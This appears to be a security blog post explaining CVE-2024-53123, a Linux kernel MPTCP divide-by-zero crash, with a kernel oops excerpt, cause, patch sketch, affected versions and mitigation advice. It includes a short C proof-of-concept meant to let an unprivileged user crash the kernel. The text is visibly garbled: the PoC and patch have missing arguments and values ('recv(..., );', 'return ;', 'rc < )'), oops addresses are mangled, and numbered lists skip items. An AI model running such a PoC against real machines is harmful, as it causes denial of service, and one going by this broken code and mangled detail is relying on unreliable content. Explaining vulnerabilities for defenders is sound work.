CVE-2024-53123 - Linux Kernel MPTCP Protocol Division by Zero Vulnerability Explained

Recently, a critical flaw was discovered and patched in the Linux kernel’s MultiPath TCP (MPTCP) protocol. This post will break down what CVE-2024-53123 is, how attackers could exploit it using simple code, and why it happened. We’ll keep the technical jargon minimal and help you fully understand the vulnerability—even if you don’t live in the kernel every day.

What is CVE-2024-53123?

CVE-2024-53123 is a vulnerability in the Linux kernel’s MPTCP protocol. This protocol allows a single TCP connection to use multiple paths, boosting reliability and speed (for example, using both WiFi and cellular). Due to improper error handling, the kernel could crash (kernel panic) due to a division by zero error if you tried to use a connection in a bad state, most commonly while rapidly disconnecting and interacting with the socket.

Who Found It, and How?

The bug was found and reported by Eric Dumazet, one of the Linux networking experts. The bug was first noticed thanks to syzbot and a clever reproducer (a simple program). The crash log (“Oops: divide error: 000 ...”) pointed right at an unchecked division in __tcp_select_window() because a key value (rcv_mss) was zero after a disconnect race.

Here’s the key part of the kernel oops message

Oops: divide error: 000 [#1] PREEMPT SMP KASAN PTI
...
RIP: __tcp_select_window+x5b4/x131 net/ipv4/tcp_output.c:3163
...
RDX: 000000000000000
...
<f7> 7c 24 14 41 29 d6 45 89 f4 e9 ec fe ff ff
...

The <f7> instruction in x86 is an integer division. Since RDX is zero, this triggers the “divide by zero” exception, crashing the kernel.

Cause: Racing Disconnect & Bad Error Handling

The bug came up because the Linux kernel didn’t properly check for errors after sk_wait_data() could return with a disconnected socket. This let code later on try to use values (like rcv_mss, the maximum segment size) that were now zero. The classic programming blunder: doing math with a value you didn’t check!

After the following commit

commit 05b92660cdfe ("tcp: fix sk_wait_data() hang with zero window and SYN")

sk_wait_data() could return early with an error, but the rest of the code didn’t check for this and just tried to keep going.

Exploit Details: How Could This Be Used?

Because this is a divide-by-zero bug in kernel space, it’s a *denial of service* (DoS) vulnerability. Any unprivileged local user could write a program to trigger this bug and bring down the whole machine.

Here’s a simplified exploit, written in C

// cve-2024-53123-poc.c
#include <sys/socket.h>
#include <linux/mptcp.h>
#include <netinet/in.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

int main() {
    int s = socket(AF_INET, SOCK_STREAM, IPPROTO_MPTCP);
    struct sockaddr_in addr = {};
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = htons(12345);

    // Connect to some service (may fail, that's ok for this bug)
    connect(s, (struct sockaddr*)&addr, sizeof(addr));

    // Disconnect the socket in a racing fashion
    shutdown(s, SHUT_RDWR);

    // Try to quickly read data (this triggers the race)
    char buf[1];
    recv(s, buf, sizeof(buf), );

    close(s);
    return ;
}

It disconnects with shutdown.

4. It races to call recv immediately after, causing the code path in the kernel to hit the buggy state.

The kernel dereferences a zero value, causing a panicky divide by zero and a system crash.

This program was just a PoC (proof of concept), but similar tricks could be used by any user on the system.

Patch and Fix

The fix for the vulnerability (now merged upstream) is simple: check for errors and return before you later use the zero value.

The patch, in essence, adds a check like this (pseudo-C)

if (unlikely(rc < ))  // error while waiting for data
    return rc;

if (unlikely(!mptcp_sk_can_recv(mptcp_socket))) // cannot receive anymore
    return ;

Along with a specific patch

- Upstream commit fixing CVE-2024-53123

Who is Affected?

- All Linux kernels with MPTCP support and that include the buggy commit, up to and including 6.12-rc5.
- Most commonly on systems where untrusted users have shell access (shared hosting, university servers, etc).

Update your kernel to the latest version (at least 6.12-rc6 or any vendor-secured backport).

2. If you can’t update immediately, you may disable MPTCP or restrict untrusted users from running custom code until you patch.

References

- Upstream bug fix commit (kernel.org)
- Syzbot report: syzkaller.com/bug?id=8c197080...
- Multipath TCP Kernel Documentation
- MPTCP upstream project

Summary

CVE-2024-53123 is a classic example of how a race condition and unchecked error code in a low-level protocol (here, MPTCP) can lead to a devastating crash vulnerability in the Linux kernel. The patch is out—please update your systems, and beware: even small races can have big effects in critical software.


*If you found this post helpful, please share with your sysadmin friends or on your favorite forum! Stay tuned for more clear explanations of the latest and greatest in Linux security.*

Timeline

Published on: 12/02/2024 14:15:13 UTC
Last modified on: 12/11/2024 21:17:25 UTC